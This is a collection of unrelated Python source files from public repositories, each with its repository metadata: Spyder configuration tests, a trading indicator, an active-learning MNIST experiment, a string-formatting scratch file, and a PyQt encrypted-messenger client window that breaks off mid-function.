1f735558d3abd06f0aa70ca44547176b357637e3 | 268568ff2d483f39de78a5b29d941ce499cace33 | /spyder/config/tests/test_manager.py | 364c3375e7688e994f5e5540acb1efa9f0e347b9 | [
"MIT"
] | permissive | MarkMoretto/spyder-master | 61e7f8007144562978da9c6adecaa3022758c56f | 5f8c64edc0bbd203a97607950b53a9fcec9d2f0b | refs/heads/master | 2023-01-10T16:34:37.825886 | 2020-08-07T19:07:56 | 2020-08-07T19:07:56 | 285,901,914 | 2 | 1 | MIT | 2022-12-20T13:46:41 | 2020-08-07T19:03:37 | Python | UTF-8 | Python | false | false | 3,509 | py | # -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""Tests for config/manager.py."""
# Standard library imports
import os
import os.path as osp
import shutil
import tempfile
# Third party imports
import pytest
# Local imports
from spyder.config.base import get_conf_path, get_conf_paths
from spyder.config.manager import ConfigurationManager
from spyder.plugins.console.plugin import Console
from spyder.py3compat import configparser
def clear_site_config():
"""Delete all test site config folders."""
for path in get_conf_paths():
shutil.rmtree(path)
def test_site_config_load():
"""
Test that the site/system config preferences are loaded with correct
precedence.
"""
clear_site_config()
for i, path in enumerate(reversed(get_conf_paths())):
exp_value = 100*(1 + i)
content = '[main]\nmemory_usage/timeout = ' + str(exp_value) + '\n'
conf_fpath = os.path.join(path, 'spyder.ini')
with open(conf_fpath, 'w') as fh:
fh.write(content)
config = ConfigurationManager()
config.reset_to_defaults()
value = config.get('main', 'memory_usage/timeout')
print(path, value, exp_value)
assert value == exp_value
clear_site_config()
def test_external_plugin_config(qtbot):
"""
Test that config for external plugins is saved as expected.
This includes a regression for part two (the shortcuts conflict) of
issue spyder-ide/spyder#11132
"""
clear_site_config()
# Emulate an old Spyder 3 configuration
spy3_config = """
[main]
version = 1.0.0
[shortcuts]
foo/bar = Alt+1
[ipython_console]
startup/run_lines =
"""
conf_fpath = get_conf_path('spyder.ini')
with open(conf_fpath, 'w') as f:
f.write(spy3_config)
# Create config manager
manager = ConfigurationManager()
# Set default options for the internal console
Console.CONF_FILE = True
defaults = [
('internal_console',
{
'max_line_count': 300,
'working_dir_history': 30,
'working_dir_adjusttocontents': False,
'wrap': True,
'codecompletion/auto': False,
'external_editor/path': 'SciTE',
'external_editor/gotoline': '-goto:'
}
),
]
Console.CONF_DEFAULTS = defaults
# Register console plugin config
manager.register_plugin(Console)
# Assert the dummy shortcut is not present in the plugin config
with pytest.raises(configparser.NoSectionError):
manager.get_shortcut('foo', 'bar', plugin_name='internal_console')
# Change an option in the console
console = Console(None, configuration=manager)
console.set_conf_option('max_line_count', 600)
# Read config filew directly
user_path = manager.get_user_config_path()
with open(osp.join(user_path, 'spyder.ini'), 'r') as f:
user_contents = f.read()
plugin_path = manager.get_plugin_config_path('internal_console')
with open(osp.join(plugin_path, 'spyder.ini'), 'r') as f:
plugin_contents = f.read()
# Assert that the change was written to the right config file
assert 'max_line_count = 600' not in user_contents
assert 'max_line_count = 600' in plugin_contents
shutil.rmtree(plugin_path)
Console.CONF_FILE = False
clear_site_config()
if __name__ == "__main__":
pytest.main()
| [
"mark.moretto@forcepoint.com"
] | mark.moretto@forcepoint.com |
46a8322fa4b383f6245a82c54d704d3bd9fcdc76 | 7b35116856a8a2dfcb356245e739236d011a751d | /jesse/indicators/hma.py | 8be9d57b17e466720683ee3e67feb482e4f8aed1 | [
"MIT"
] | permissive | shaunstanislauslau/jesse | a13fa212edd3ff1fa4b1aa743e9ec03efab4e091 | 4a7658813f765287f5aad99b8619d98eac5bfe7b | refs/heads/master | 2023-07-20T14:39:25.232089 | 2021-03-30T16:32:39 | 2021-03-30T16:32:39 | 353,088,903 | 0 | 0 | MIT | 2023-07-06T22:41:29 | 2021-03-30T17:39:46 | null | UTF-8 | Python | false | false | 748 | py | from typing import Union
import numpy as np
import tulipy as ti
from jesse.helpers import get_candle_source, same_length, slice_candles
def hma(candles: np.ndarray, period: int = 5, source_type: str = "close", sequential: bool = False) -> Union[
float, np.ndarray]:
"""
Hull Moving Average
:param candles: np.ndarray
:param period: int - default: 5
:param source_type: str - default: "close"
:param sequential: bool - default=False
:return: float | np.ndarray
"""
candles = slice_candles(candles, sequential)
source = get_candle_source(candles, source_type=source_type)
res = ti.hma(np.ascontiguousarray(source), period=period)
return same_length(candles, res) if sequential else res[-1]
| [
"mysecondworld@firesurf.de"
] | mysecondworld@firesurf.de |
c21aca46aeb7e6aacb91b28c29f10ac5d5f1e5ee | 35f9def6e6d327d3a4a4f2959024eab96f199f09 | /developer/lab/OpenAi/lab/main.py | e816f070d1384fa0cb602ade37d792dc8a2d5945 | [
"MIT",
"CAL-1.0-Combined-Work-Exception",
"CAL-1.0",
"CC-BY-SA-4.0",
"LicenseRef-scancode-free-unknown"
] | permissive | arXiv-research/DevLab-III-1 | ec10aef27e1ca75f206fea11014da8784752e454 | c50cd2b9154c83c3db5e4a11b9e8874f7fb8afa2 | refs/heads/main | 2023-04-16T19:24:58.758519 | 2021-04-28T20:21:23 | 2021-04-28T20:21:23 | 362,599,929 | 2 | 0 | MIT | 2021-04-28T20:36:11 | 2021-04-28T20:36:11 | null | UTF-8 | Python | false | false | 122 | py | from rl.experiment import run
from rl.util import args
if __name__ == '__main__':
run(args.experiment, **vars(args))
| [
"noreply@github.com"
] | arXiv-research.noreply@github.com |
09b390ae6289622e3995c1e7a72ff45395efd0e8 | 11b420a9e6dbe371167227f41ef8e344e3382612 | /ConvNets/FINAL_Averaged_Experiments/N=3000/Q=10/Max_Entropy/Max_Entropy_Q10_N3000.py | 730e0fddd928e420fb8156c8c7c3c1615cbc7e43 | [
"MIT"
] | permissive | tarek-ullah/Active-Learning-Bayesian-Convolutional-Neural-Networks | 7092386758b68dc922efaa2c2eba055930bf2896 | f8b68038bd3b97c473e9c1de6b6cdee4538021f4 | refs/heads/master | 2021-01-13T06:57:19.343775 | 2016-11-02T12:22:16 | 2016-11-02T12:22:16 | 81,338,773 | 1 | 0 | null | 2017-02-08T14:34:15 | 2017-02-08T14:34:15 | null | UTF-8 | Python | false | false | 11,816 | py | from __future__ import print_function
from keras.datasets import mnist
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.optimizers import SGD, Adadelta, Adagrad, Adam
from keras.utils import np_utils, generic_utils
from six.moves import range
import numpy as np
import scipy as sp
from keras import backend as K
import random
import scipy.io
import matplotlib.pyplot as plt
from keras.regularizers import l2, activity_l2
Experiments = 3
batch_size = 128
nb_classes = 10
#use a large number of epochs
nb_epoch = 80
# input image dimensions
img_rows, img_cols = 28, 28
# number of convolutional filters to use
nb_filters = 32
# size of pooling area for max pooling
nb_pool = 2
# convolution kernel size
nb_conv = 3
score=0
all_accuracy = 0
acquisition_iterations = 290
#use a large number of dropout iterations
Queries = 10
Experiments_All_Accuracy = np.zeros(shape=(acquisition_iterations+1))
for e in range(Experiments):
print('Experiment Number ', e)
# the data, shuffled and split between tran and test sets
(X_train_All, y_train_All), (X_test, y_test) = mnist.load_data()
X_train_All = X_train_All.reshape(X_train_All.shape[0], 1, img_rows, img_cols)
X_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)
random_split = np.asarray(random.sample(range(0,X_train_All.shape[0]), X_train_All.shape[0]))
X_train_All = X_train_All[random_split, :, :, :]
y_train_All = y_train_All[random_split]
X_valid = X_train_All[10000:15000, :, :, :]
y_valid = y_train_All[10000:15000]
X_Pool = X_train_All[20000:60000, :, :, :]
y_Pool = y_train_All[20000:60000]
X_train_All = X_train_All[0:10000, :, :, :]
y_train_All = y_train_All[0:10000]
#training data to have equal distribution of classes
idx_0 = np.array( np.where(y_train_All==0) ).T
idx_0 = idx_0[0:10,0]
X_0 = X_train_All[idx_0, :, :, :]
y_0 = y_train_All[idx_0]
idx_1 = np.array( np.where(y_train_All==1) ).T
idx_1 = idx_1[0:10,0]
X_1 = X_train_All[idx_1, :, :, :]
y_1 = y_train_All[idx_1]
idx_2 = np.array( np.where(y_train_All==2) ).T
idx_2 = idx_2[0:10,0]
X_2 = X_train_All[idx_2, :, :, :]
y_2 = y_train_All[idx_2]
idx_3 = np.array( np.where(y_train_All==3) ).T
idx_3 = idx_3[0:10,0]
X_3 = X_train_All[idx_3, :, :, :]
y_3 = y_train_All[idx_3]
idx_4 = np.array( np.where(y_train_All==4) ).T
idx_4 = idx_4[0:10,0]
X_4 = X_train_All[idx_4, :, :, :]
y_4 = y_train_All[idx_4]
idx_5 = np.array( np.where(y_train_All==5) ).T
idx_5 = idx_5[0:10,0]
X_5 = X_train_All[idx_5, :, :, :]
y_5 = y_train_All[idx_5]
idx_6 = np.array( np.where(y_train_All==6) ).T
idx_6 = idx_6[0:10,0]
X_6 = X_train_All[idx_6, :, :, :]
y_6 = y_train_All[idx_6]
idx_7 = np.array( np.where(y_train_All==7) ).T
idx_7 = idx_7[0:10,0]
X_7 = X_train_All[idx_7, :, :, :]
y_7 = y_train_All[idx_7]
idx_8 = np.array( np.where(y_train_All==8) ).T
idx_8 = idx_8[0:10,0]
X_8 = X_train_All[idx_8, :, :, :]
y_8 = y_train_All[idx_8]
idx_9 = np.array( np.where(y_train_All==9) ).T
idx_9 = idx_9[0:10,0]
X_9 = X_train_All[idx_9, :, :, :]
y_9 = y_train_All[idx_9]
X_train = np.concatenate((X_0, X_1, X_2, X_3, X_4, X_5, X_6, X_7, X_8, X_9), axis=0 )
y_train = np.concatenate((y_0, y_1, y_2, y_3, y_4, y_5, y_6, y_7, y_8, y_9), axis=0 )
print('X_train shape:', X_train.shape)
print(X_train.shape[0], 'train samples')
print('Distribution of Training Classes:', np.bincount(y_train))
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_valid = X_valid.astype('float32')
X_Pool = X_Pool.astype('float32')
X_train /= 255
X_valid /= 255
X_Pool /= 255
X_test /= 255
Y_test = np_utils.to_categorical(y_test, nb_classes)
Y_valid = np_utils.to_categorical(y_valid, nb_classes)
Y_Pool = np_utils.to_categorical(y_Pool, nb_classes)
#loss values in each experiment
Pool_Valid_Loss = np.zeros(shape=(nb_epoch, 1))
Pool_Train_Loss = np.zeros(shape=(nb_epoch, 1))
Pool_Valid_Acc = np.zeros(shape=(nb_epoch, 1))
Pool_Train_Acc = np.zeros(shape=(nb_epoch, 1))
x_pool_All = np.zeros(shape=(1))
Y_train = np_utils.to_categorical(y_train, nb_classes)
print('Training Model Without Acquisitions in Experiment', e)
model = Sequential()
model.add(Convolution2D(nb_filters, nb_conv, nb_conv, border_mode='valid', input_shape=(1, img_rows, img_cols)))
model.add(Activation('relu'))
model.add(Convolution2D(nb_filters, nb_conv, nb_conv))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))
model.add(Dropout(0.25))
model.add(Convolution2D(nb_filters*2, nb_conv, nb_conv, border_mode='valid', input_shape=(1, img_rows, img_cols)))
model.add(Activation('relu'))
model.add(Convolution2D(nb_filters*2, nb_conv, nb_conv))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))
model.add(Dropout(0.25))
c = 10
Weight_Decay = c / float(X_train.shape[0])
model.add(Flatten())
model.add(Dense(128, W_regularizer=l2(Weight_Decay)))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(nb_classes))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam')
hist = model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=1, validation_data=(X_valid, Y_valid))
Train_Result_Optimizer = hist.history
Train_Loss = np.asarray(Train_Result_Optimizer.get('loss'))
Train_Loss = np.array([Train_Loss]).T
Valid_Loss = np.asarray(Train_Result_Optimizer.get('val_loss'))
Valid_Loss = np.asarray([Valid_Loss]).T
Train_Acc = np.asarray(Train_Result_Optimizer.get('acc'))
Train_Acc = np.array([Train_Acc]).T
Valid_Acc = np.asarray(Train_Result_Optimizer.get('val_acc'))
Valid_Acc = np.asarray([Valid_Acc]).T
Pool_Train_Loss = Train_Loss
Pool_Valid_Loss = Valid_Loss
Pool_Train_Acc = Train_Acc
Pool_Valid_Acc = Valid_Acc
Pool_Train_Loss = Train_Loss
Pool_Valid_Loss = Valid_Loss
print('Evaluating Test Accuracy Without Acquisition')
score, acc = model.evaluate(X_test, Y_test, show_accuracy=True, verbose=0)
all_accuracy = acc
print('Starting Active Learning in Experiment ', e)
for i in range(acquisition_iterations):
print('POOLING ITERATION', i)
print('Using trained model for Entropy Calculation')
Class_Probability = model.predict_proba(X_Pool, batch_size=batch_size, verbose=1)
Class_Log_Probability = np.log2(Class_Probability)
Entropy_Each_Cell = - np.multiply(Class_Probability, Class_Log_Probability)
Entropy = np.sum(Entropy_Each_Cell, axis=1) # summing across rows of the array
#x_pool_index = np.unravel_index(Entropy.argmax(), Entropy.shape) #for finding the maximum value np.amax(Entropy)
x_pool_index = Entropy.argsort()[-Queries:][::-1]
# THIS FINDS THE INDEX OF THE MINIMUM
# a_1d = Entropy.flatten()
# x_pool_index = a_1d.argsort()[-N:]
#saving pooled images
# for im in range(x_pool_index[0:2].shape[0]):
# Image = X_Pool[x_pool_index[im], :, :, :]
# img = Image.reshape((28,28))
# sp.misc.imsave('/home/ri258/Documents/Project/Active-Learning-Deep-Convolutional-Neural-Networks/ConvNets/Cluster_Experiments/Max_Entropy/Pooled_Images/' + 'Experiment_' + str(e) +'Pool_Iter'+str(i)+'_Image_'+str(im)+'.jpg', img)
#store all the pooled images indexes
x_pool_All = np.append(x_pool_All, x_pool_index)
Pooled_X = X_Pool[x_pool_index, :, :, :]
Pooled_Y = y_Pool[x_pool_index] # true label from the oracle
print('Acquised Points added to training set')
X_train = np.concatenate((X_train, Pooled_X), axis=0)
y_train = np.concatenate((y_train, Pooled_Y), axis=0)
#delete the currently pooled points from the pool set
X_Pool = np.delete(X_Pool, x_pool_index, 0)
print('Training Model with pooled points')
# convert class vectors to binary class matrices
Y_train = np_utils.to_categorical(y_train, nb_classes)
model = Sequential()
model.add(Convolution2D(nb_filters, nb_conv, nb_conv, border_mode='valid', input_shape=(1, img_rows, img_cols)))
model.add(Activation('relu'))
model.add(Convolution2D(nb_filters, nb_conv, nb_conv))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))
model.add(Dropout(0.25))
c = 10
Weight_Decay = c / float(X_train.shape[0])
model.add(Flatten())
model.add(Dense(128, W_regularizer=l2(Weight_Decay)))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(nb_classes))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam')
hist = model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=1, validation_data=(X_valid, Y_valid))
Train_Result_Optimizer = hist.history
Train_Loss = np.asarray(Train_Result_Optimizer.get('loss'))
Train_Loss = np.array([Train_Loss]).T
Valid_Loss = np.asarray(Train_Result_Optimizer.get('val_loss'))
Valid_Loss = np.asarray([Valid_Loss]).T
Train_Acc = np.asarray(Train_Result_Optimizer.get('acc'))
Train_Acc = np.array([Train_Acc]).T
Valid_Acc = np.asarray(Train_Result_Optimizer.get('val_acc'))
Valid_Acc = np.asarray([Valid_Acc]).T
#Accumulate the training and validation/test loss after every pooling iteration - for plotting
Pool_Valid_Loss = np.append(Pool_Valid_Loss, Valid_Loss, axis=1)
Pool_Train_Loss = np.append(Pool_Train_Loss, Train_Loss, axis=1)
Pool_Valid_Acc = np.append(Pool_Valid_Acc, Valid_Acc, axis=1)
Pool_Train_Acc = np.append(Pool_Train_Acc, Train_Acc, axis=1)
print('Evaluate Model Test Accuracy with pooled points')
score, acc = model.evaluate(X_test, Y_test, show_accuracy=True, verbose=0)
print('Test score:', score)
print('Test accuracy:', acc)
all_accuracy = np.append(all_accuracy, acc)
print('Use this trained model with pooled points for Dropout again')
print('Storing Accuracy Values over experiments')
Experiments_All_Accuracy = Experiments_All_Accuracy + all_accuracy
print('Saving Results Per Experiment')
np.save('/home/ri258/Documents/Project/MPhil_Thesis_Cluster_Experiments/ConvNets/Cluster_Experiments/Max_Entropy/Results/'+'Averaged_Main_Max_Entropy_Q10_N3000_Train_Loss_'+ 'Experiment_' + str(e) + '.npy', Pool_Train_Loss)
np.save('/home/ri258/Documents/Project/MPhil_Thesis_Cluster_Experiments/ConvNets/Cluster_Experiments/Max_Entropy/Results/'+ 'Averaged_Main_Max_Entropy_Q10_N3000_Valid_Loss_'+ 'Experiment_' + str(e) + '.npy', Pool_Valid_Loss)
np.save('/home/ri258/Documents/Project/MPhil_Thesis_Cluster_Experiments/ConvNets/Cluster_Experiments/Max_Entropy/Results/'+'Averaged_Main_Max_Entropy_Q10_N3000_Train_Acc_'+ 'Experiment_' + str(e) + '.npy', Pool_Train_Acc)
np.save('/home/ri258/Documents/Project/MPhil_Thesis_Cluster_Experiments/ConvNets/Cluster_Experiments/Max_Entropy/Results/'+ 'Averaged_Main_Max_Entropy_Q10_N3000_Valid_Acc_'+ 'Experiment_' + str(e) + '.npy', Pool_Valid_Acc)
np.save('/home/ri258/Documents/Project/MPhil_Thesis_Cluster_Experiments/ConvNets/Cluster_Experiments/Max_Entropy/Results/'+'Averaged_Main_Max_Entropy_Q10_N3000_Pooled_Image_Index_'+ 'Experiment_' + str(e) + '.npy', x_pool_All)
np.save('/home/ri258/Documents/Project/MPhil_Thesis_Cluster_Experiments/ConvNets/Cluster_Experiments/Max_Entropy/Results/'+ 'Averaged_Main_Max_Entropy_Q10_N3000_Accuracy_Results_'+ 'Experiment_' + str(e) + '.npy', all_accuracy)
print('Saving Average Accuracy Over Experiments')
Average_Accuracy = np.divide(Experiments_All_Accuracy, Experiments)
np.save('/home/ri258/Documents/Project/MPhil_Thesis_Cluster_Experiments/ConvNets/Cluster_Experiments/Max_Entropy/Results/'+'Averaged_Main_Max_Entropy_Q10_N3000_Average_Accuracy'+'.npy', Average_Accuracy)
| [
"riashat.islam.93@gmail.com"
] | riashat.islam.93@gmail.com |
4feb30114b2c476812f4f003b8dcdf252ef3718e | e262e64415335060868e9f7f73ab8701e3be2f7b | /.history/demo1_20201107181245.py | 2f6a553cf350e59408c1cbdc619074b719aa1300 | [] | no_license | Allison001/developer_test | 6e211f1e2bd4287ee26fd2b33baf1c6a8d80fc63 | b8e04b4b248b0c10a35e93128a5323165990052c | refs/heads/master | 2023-06-18T08:46:40.202383 | 2021-07-23T03:31:54 | 2021-07-23T03:31:54 | 322,807,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 738 | py | # import sys
# import yaml
# from demo import search
# from demo import a
# from demo import search1
# search("A")
# print(a)
# search1(12)
# print(dir())
# print(sys.path)
# name = "zhang"
# age = 12
# print("my name is:{0},my age is:{1}".format(name,age))
# list1 = [1,3,2]
# dic1 = {"a":1,"b":2}
# print("List is :{},Dic is :{}".format(list1,dic1))
# print("list id :%s,Dic is :%s" %(list1,dic1))
# list = ["happy",'nause','doctor']
# print("my job is:%s,%s,%s" %(list[0],list[1],list[2]))
# print("my job is:{},{},{}".format(*list))
# dic1 = {"name":"tom","age":12}
# print("my name is:{name},my age is: {age}".format(**dic1))
# print("my name is:%s,my age is:%d" %(dic1["name"],dic1["age"]))
name = "allison"
age = 23
| [
"zhangyingxbba@gmail.com"
] | zhangyingxbba@gmail.com |
594eea4c930aca5711b3e1ffab4751c1af242b54 | f35e820678dd9ba88195abf8739826222236736e | /client/main_window.py | 8dbe6be3a4bda3d3d95751e68912d2e27cf10e79 | [] | no_license | spoliv/Messenger | a58065b13cdfb7f41e4f0213ccc9383f4e4b1e4c | ecb1bb2559cc5a8b3f537f510eafb2c21f2a2fe5 | refs/heads/master | 2022-12-24T21:30:17.695897 | 2020-09-28T15:58:03 | 2020-09-28T15:58:03 | 299,356,465 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,793 | py | from common.constants import *
from common.errors import ServerError
from client.start_dialog import UserNameDialog
from client.transport import ClientTransfer, send_message
from client.database import ClientDatabase
from client.del_contact import DelContactDialog
from client.add_contact import AddContactDialog
from client.main_window_conv import Ui_MainClientWindow
from PyQt5.QtWidgets import (
QMainWindow,
qApp,
QMessageBox,
QApplication,
QListView,
QAction,
QTextEdit,
QFileDialog,
QPushButton,
QLabel,
QHBoxLayout)
from PyQt5.QtGui import QStandardItemModel, QStandardItem, QBrush, QColor, QIcon, QFont, QPixmap
from PyQt5.QtCore import pyqtSlot, QEvent, Qt, QRect
from Crypto.Cipher import PKCS1_OAEP
from Crypto.PublicKey import RSA
from PIL import Image
import sys
import json
import logging
import time
import base64
sys.path.append('../')
client_logger = logging.getLogger('client')
# Класс основного окна
class ClientMainWindow(QMainWindow):
def __init__(self, database, transport, keys):
super().__init__()
# основные переменные
self.database = database
self.transport = transport
# объект - дешифорвщик сообщений с предзагруженным ключём
self.decrypter = PKCS1_OAEP.new(keys)
# Загружаем конфигурацию окна из дизайнера
self.ui = Ui_MainClientWindow()
self.ui.setupUi(self)
# Кнопка "Выход"
self.ui.menu_exit.triggered.connect(qApp.exit)
# Кнопка отправить сообщение
self.ui.btn_send.clicked.connect(self.send_message)
# "добавить контакт"
self.ui.btn_add_contact.clicked.connect(self.add_contact_window)
self.ui.menu_add_contact.triggered.connect(self.add_contact_window)
# Удалить контакт
self.ui.btn_remove_contact.clicked.connect(self.delete_contact_window)
self.ui.menu_del_contact.triggered.connect(self.delete_contact_window)
# Добавить аватар или выбрать из БД клиента
self.ui.menu_add_avatar.triggered.connect(self.add_avat_user)
self.ui.menu_select_avatar.triggered.connect(self.sel_avat_user)
# Выбрать аватар
# self.ui.btn_avatar.clicked.connect(self.select_avatar)
# Кнопка Перейти в чат
self.ui.btn_chat.clicked.connect(self.create_message_for_chat)
# Кнопка поиска сообщений по имени пользователя
self.ui.btn_search.clicked.connect(self.search_mess_on_name)
# Дополнительные требующиеся атрибуты
self.contacts_model = None
self.history_model = None
self.messages = QMessageBox()
self.current_chat = None
self.current_chat_key = None
self.encryptor = None
self.ui.list_messages.setHorizontalScrollBarPolicy(
Qt.ScrollBarAlwaysOff)
self.ui.list_messages.setWordWrap(True)
# Даблклик по листу контактов отправляется в обработчик
self.ui.list_contacts.doubleClicked.connect(self.select_active_user)
# Добавляем туллбар с форматированием текста и смайликами
our_bold = QAction(QIcon('img/b.jpg'), 'Bold', self)
our_bold.triggered.connect(self.actionBold)
our_italic = QAction(QIcon('img/i.jpg'), 'Italic', self)
our_italic.triggered.connect(self.actionItalic)
our_underlined = QAction(QIcon('img/u.jpg'), 'Underlined', self)
our_underlined.triggered.connect(self.actionUnderlined)
smile = QAction(QIcon('img/ab.gif'), 'Smile', self)
smile.triggered.connect(self.actionSmile)
melancholy = QAction(QIcon('img/ac.gif'), 'Melancholy', self)
melancholy.triggered.connect(self.actionMelancholy)
surprise = QAction(QIcon('img/ai.gif'), 'Surprise', self)
surprise.triggered.connect(self.actionSurprise)
# avatar = QAction(QIcon('avatar.jpg'), 'Avatar', self)
# avatar.triggered.connect(self.actionSelectAvat)
toolBar = self.addToolBar('Formatting')
toolBar.addAction(our_bold)
toolBar.addAction(our_italic)
toolBar.addAction(our_underlined)
toolBar.addAction(smile)
toolBar.addAction(melancholy)
toolBar.addAction(surprise)
# toolBar.addAction(avatar)
self.clients_list_update()
self.set_disabled_input()
self.show()
def actionBold(self):
myFont = QFont()
myFont.setBold(True)
self.ui.text_message.setFont(myFont)
def actionItalic(self):
myFont = QFont()
myFont.setItalic(True)
self.ui.text_message.setFont(myFont)
def actionUnderlined(self):
myFont = QFont()
myFont.setUnderline(True)
self.ui.text_message.setFont(myFont)
def actionSmile(self):
url = 'img/ab.gif'
self.ui.text_message.setHtml('<img src="%s" />' % url)
def actionMelancholy(self):
url = 'img/ac.gif'
self.ui.text_message.setHtml('<img src="%s" />' % url)
def actionSurprise(self):
url = 'img/ai.gif'
self.ui.text_message.setHtml('<img src="%s" />' % url)
# def actionSelectAvat(self):
# pass
# Деактивировать поля ввода
def set_disabled_input(self):
# Надпись - получатель.
self.ui.label_new_message.setText(
'Для выбора получателя дважды кликните на нем в окне контактов.')
self.ui.text_message.clear()
if self.history_model:
self.history_model.clear()
# Поле ввода и кнопка отправки неактивны до выбора получателя.
self.ui.btn_clear.setDisabled(True)
self.ui.btn_send.setDisabled(True)
self.ui.text_message.setDisabled(True)
self.encryptor = None
self.current_chat = None
self.current_chat_key = None
# Заполняем историю сообщений.
def history_list_update(self):
# Получаем историю сортированную по дате
list = sorted(
self.database.get_history(
self.current_chat),
key=lambda item: item[3])
# Если модель не создана, создадим.
if not self.history_model:
self.history_model = QStandardItemModel()
self.ui.list_messages.setModel(self.history_model)
# Очистим от старых записей
self.history_model.clear()
# Берём не более 20 последних записей.
length = len(list)
start_index = 0
if length > 20:
start_index = length - 20
# Заполнение модели записями, так-же стоит разделить входящие и исходящие выравниванием и разным фоном.
# Записи в обратном порядке, поэтому выбираем их с конца и не более 20
for i in range(start_index, length):
item = list[i]
if item[1] == 'in':
mess = QStandardItem(
f'Входящее от {item[3].replace(microsecond=0)}:\n {item[2]}')
mess.setEditable(False)
mess.setBackground(QBrush(QColor(255, 213, 213)))
mess.setTextAlignment(Qt.AlignLeft)
self.history_model.appendRow(mess)
else:
mess = QStandardItem(
f'Исходящее от {item[3].replace(microsecond=0)}:\n {item[2]}')
mess.setEditable(False)
mess.setTextAlignment(Qt.AlignRight)
mess.setBackground(QBrush(QColor(204, 255, 204)))
self.history_model.appendRow(mess)
self.ui.list_messages.scrollToBottom()
# Функция обработчик даблклика по контакту
def select_active_user(self):
# Выбранный пользователем (даблклик) находится в выделеном элементе в
# QListView
self.current_chat = self.ui.list_contacts.currentIndex().data()
# вызываем основную функцию
self.set_active_user()
# Функция устанавливающяя активного собеседника
def set_active_user(self):
# Запрашиваем публичный ключ пользователя и создаём объект шифрования
try:
self.current_chat_key = self.transport.key_request(
self.current_chat)
client_logger.debug(
f'Загружен открытый ключ для {self.current_chat}')
if self.current_chat_key:
self.encryptor = PKCS1_OAEP.new(
RSA.import_key(self.current_chat_key))
except (OSError, json.JSONDecodeError):
self.current_chat_key = None
self.encryptor = None
client_logger.debug(
f'Не удалось получить ключ для {self.current_chat}')
# Если ключа нет то ошибка, что не удалось начать чат с пользователем
if not self.current_chat_key:
self.messages.warning(
self, 'Ошибка', 'Для выбранного пользователя нет ключа шифрования.')
return
# Ставим надпись и активируем кнопки
self.ui.label_new_message.setText(
f'Введите сообщенние для {self.current_chat}:')
self.ui.btn_clear.setDisabled(False)
self.ui.btn_send.setDisabled(False)
self.ui.text_message.setDisabled(False)
# Заполняем окно историю сообщений по требуемому пользователю.
self.history_list_update()
# Функция обновляющяя контакт лист
def clients_list_update(self):
contacts_list = self.database.get_contacts()
self.contacts_model = QStandardItemModel()
for i in sorted(contacts_list):
item = QStandardItem(i)
item.setEditable(False)
self.contacts_model.appendRow(item)
self.ui.list_contacts.setModel(self.contacts_model)
# Функция добавления контакта
def add_contact_window(self):
global select_dialog
select_dialog = AddContactDialog(self.transport, self.database)
select_dialog.btn_ok.clicked.connect(
lambda: self.add_contact_action(select_dialog))
select_dialog.show()
# Функция - обработчик добавления, сообщает серверу, обновляет таблицу и
# список контактов
def add_contact_action(self, item):
new_contact = item.selector.currentText()
self.add_contact(new_contact)
item.close()
# Функция добавляющяя контакт в базы
def add_contact(self, new_contact):
try:
self.transport.add_contact(new_contact)
except ServerError as err:
self.messages.critical(self, 'Ошибка сервера', err.text)
except OSError as err:
if err.errno:
self.messages.critical(
self, 'Ошибка', 'Потеряно соединение с сервером!')
self.close()
self.messages.critical(self, 'Ошибка', 'Таймаут соединения!')
else:
self.database.add_contact(new_contact)
new_contact = QStandardItem(new_contact)
new_contact.setEditable(False)
self.contacts_model.appendRow(new_contact)
client_logger.info(f'Успешно добавлен контакт {new_contact}')
self.messages.information(
self, 'Успех', 'Контакт успешно добавлен.')
# Функция удаления контакта
def delete_contact_window(self):
global remove_dialog
remove_dialog = DelContactDialog(self.database)
remove_dialog.btn_ok.clicked.connect(
lambda: self.delete_contact(remove_dialog))
remove_dialog.show()
# Функция обработчик удаления контакта, сообщает на сервер, обновляет
# таблицу контактов
def delete_contact(self, item):
selected = item.selector.currentText()
try:
self.transport.remove_contact(selected)
except ServerError as err:
self.messages.critical(self, 'Ошибка сервера', err.text)
except OSError as err:
if err.errno:
self.messages.critical(
self, 'Ошибка', 'Потеряно соединение с сервером!')
self.close()
self.messages.critical(self, 'Ошибка', 'Таймаут соединения!')
else:
self.database.del_contact(selected)
self.clients_list_update()
client_logger.info(f'Успешно удалён контакт {selected}')
self.messages.information(self, 'Успех', 'Контакт успешно удалён.')
item.close()
# Если удалён активный пользователь, то деактивируем поля ввода.
if selected == self.current_chat:
self.current_chat = None
self.set_disabled_input()
# Функция отправки собщения пользователю.
def send_message(self):
# Текст в поле, проверяем что поле не пустое затем забирается сообщение
# и поле очищается
message_text = self.ui.text_message.toPlainText()
self.ui.text_message.clear()
if not message_text:
return
# Шифруем сообщение ключом получателя и упаковываем в base64.
message_text_encrypted = self.encryptor.encrypt(
message_text.encode('utf8'))
message_text_encrypted_base64 = base64.b64encode(
message_text_encrypted)
try:
self.transport.send_message(
self.current_chat,
message_text_encrypted_base64.decode('ascii'))
pass
except ServerError as err:
self.messages.critical(self, 'Ошибка', err.text)
except OSError as err:
if err.errno:
self.messages.critical(
self, 'Ошибка', 'Потеряно соединение с сервером!')
self.close()
self.messages.critical(self, 'Ошибка', 'Таймаут соединения!')
except (ConnectionResetError, ConnectionAbortedError):
self.messages.critical(
